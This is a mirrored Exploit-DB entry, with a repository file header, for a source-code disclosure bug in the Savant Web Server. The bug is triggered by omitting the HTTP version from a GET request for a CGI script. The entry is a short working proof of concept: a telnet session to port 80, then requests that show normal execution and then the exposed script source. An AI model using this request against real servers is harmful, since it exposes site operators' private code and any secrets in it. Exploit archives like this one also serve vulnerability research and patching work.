exploit-db-mirror/exploits/cgi/remote/19995.txt
Offensive Security d304cc3d3e DB: 2017-11-24
116602 new exploits

Too many to list!
2017-11-24 20:56:23 +00:00

11 lines
No EOL
326 B
Text

source: http://www.securityfocus.com/bid/1313/info
Omitting the HTTP version from a "GET" request for a CGI script to the Savant Web Server discloses the source code of the script.
telnet target 80
GET /cgi-bin/script.xyz HTTP/1.0
<proper script execution/output>
GET /cgi-bin/script.xyz
<source code displayed>